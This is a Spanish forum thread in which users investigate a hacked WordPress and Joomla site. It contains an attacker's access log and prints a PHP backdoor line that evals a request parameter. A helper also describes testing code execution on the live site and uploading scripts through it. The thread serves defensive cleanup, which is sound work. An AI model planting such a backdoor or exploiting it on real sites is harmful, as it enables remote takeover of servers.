Autor
|
Tema: Mi Wordpress Hackeado (Leído 36,966 veces)
|
MinusFour
|
Parece que hay una variable ahí que no esta siendo limpiada, una $GET["req"]. Esas entradas simplemente están haciendo un echo, no se si alguien más haya hecho algo.
EDIT: Parece que si puedes hacer XSS por medio del primero, cuarto y quinto link.
|
|
« Última modificación: 25 Julio 2014, 04:29 am por MinusFour »
|
En línea
|
|
|
|
ka0s
Desconectado
Mensajes: 308
|
Parece que hay una variable ahí que no esta siendo limpiada, una $GET["req"]. Esas entradas simplemente están haciendo un echo, no se si alguien más haya hecho algo.
Veremos que dice #!drvy de eso. Yo por lo pronto estoy intentando acceder al panel de admin de Joomla para ver que versión tiene y que cosas está usando... -_-. Ojala podamos encontrar la vulnerabilidad que han dicho arriba
|
|
|
En línea
|
|
|
|
MinusFour
|
Veremos que dice #!drvy de eso. Yo por lo pronto estoy intentando acceder al panel de admin de Joomla para ver que versión tiene y que cosas está usando... -_-. Ojala podamos encontrar la vulnerabilidad que han dicho arriba
Seria muy facil subir un script ahi por medio de fopen() y luego simplemente llamarlo a ejecutar.... y puedes hacer lo que tu quieras con eso XD.
|
|
« Última modificación: 25 Julio 2014, 04:35 am por MinusFour »
|
En línea
|
|
|
|
ka0s
Desconectado
Mensajes: 308
|
Seria muy facil subir un script ahi por medio de file_get_contents() y luego simplemente llamarlo a ejecutar.... y puedes hacer lo que tu quieras con eso XD.
Trato de intentar entender lo que dices, pero se me complica mucho. Como puedo corregir eso de la variable que dices?? En que archivo se encuentra? Gracias Minus
|
|
|
En línea
|
|
|
|
#!drvy
|
Efectivamente, como ha mencionado @MinusFour, ese archivo ejecuta directamente el php, es vulnerable. Lo que si he podido aislar es el ataque.. 176.31.251.103 - - [06/Jul/2014:21:23:24 -0300] "GET /wp-login.php HTTP/1.1" 200 2827 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:25 -0300] "POST /wp-login.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:26 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:29 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:31 -0300] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 33381 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:32 -0300] "GET /wp-admin/theme-editor.php?file=404.php&theme=wilborada HTTP/1.1" 200 18746 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:33 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:34 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 151 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:35 -0300] "POST /wp-content/themes/wilborada/404.php HTTP/1.1" 200 47 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:36 -0300] "GET /wp-content/themes/wilborada/systemcash.php HTTP/1.1" 200 120 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:38 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" 176.31.251.103 - - [06/Jul/2014:21:23:39 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 3 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
El atacante obtuvo aceso logueandose, modifico el 404.php del tema, lo abrio y lo volvio a modificar. Tambien se ve el primer acceso a systemcash.php.. despues, hay entradas de bots con UA (Mozilla 3.0) que acceden a el muchisimas veces. Todos los archivos sospechosos están borrados sin embargo (y no he sido yo) xD Estoy mirando el archivo ese de joomla. Saludos
|
|
|
En línea
|
|
|
|
MinusFour
|
Trato de intentar entender lo que dices, pero se me complica mucho. Como puedo corregir eso de la variable que dices?? En que archivo se encuentra? Gracias Minus
No se de que archivo, solo se que le estan pasando una variable GET y no están escapando los caracteres especiales, por lo que el código se ejecuta. Realmente lo único que he probado es: echo $_SERVER["SERVER_NAME"] para lo cual me trae: www.wilboradalibros.com.ar
|
|
|
En línea
|
|
|
|
#!drvy
|
En el archivo litermalmente pone esto: <?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?> PD: He comentado la linea.. no debería dar mas problemas. PD2: Como sugerencia, dile a tu amiga que siempre actualice y que use una contraseña mas segura.. Saludos
|
|
« Última modificación: 25 Julio 2014, 04:47 am por #!drvy »
|
En línea
|
|
|
|
ka0s
Desconectado
Mensajes: 308
|
En el archivo litermalmente pone esto: <?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?> PD: He comentado la linea.. no debería dar mas problemas. Saludos #!drvy con esto quieres que decir que está TODO SOLUCIONADO? Me podrías decir qué linea era y de que archivo por favor así miro la línea que has comentado. Me gustaría saber que línea habia antes y compararla con la que has puesto ahora. Despues de semejante post y horas aquí, quiero seguir aprendiendo un poco. Yo estaba tratando de acceder al Administrador de Joomla, pero no me ha pasado los datos de esa parte, solo la de Wordpress ¬¬ y quería ver que versión tenía instalada. Porque pensé que si la Wordpress tenia la versión vieja, seguramente la de Joomla también y eso repararía el error no creen?
|
|
|
En línea
|
|
|
|
#!drvy
|
Si se me olvido mencionarlo.. El archivo esta en peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php La linea uno contenía lo que puse en el post de arriba, y ahora tiene <?php #$post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>
PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD Saludos
|
|
|
En línea
|
|
|
|
MinusFour
|
¿Esa linea es innecesaria? No vay a ser que la ocupen para algo. El eval para que jodidas lo están usando directamente en una variable GET o POST, que puede ser tan importante para enviarlo así.
Por cierto, hay otras entradas que hacen lo mismo. Edit: La 4 y la 5 entrada.
|
|
« Última modificación: 25 Julio 2014, 04:55 am por MinusFour »
|
En línea
|
|
|
|
|
|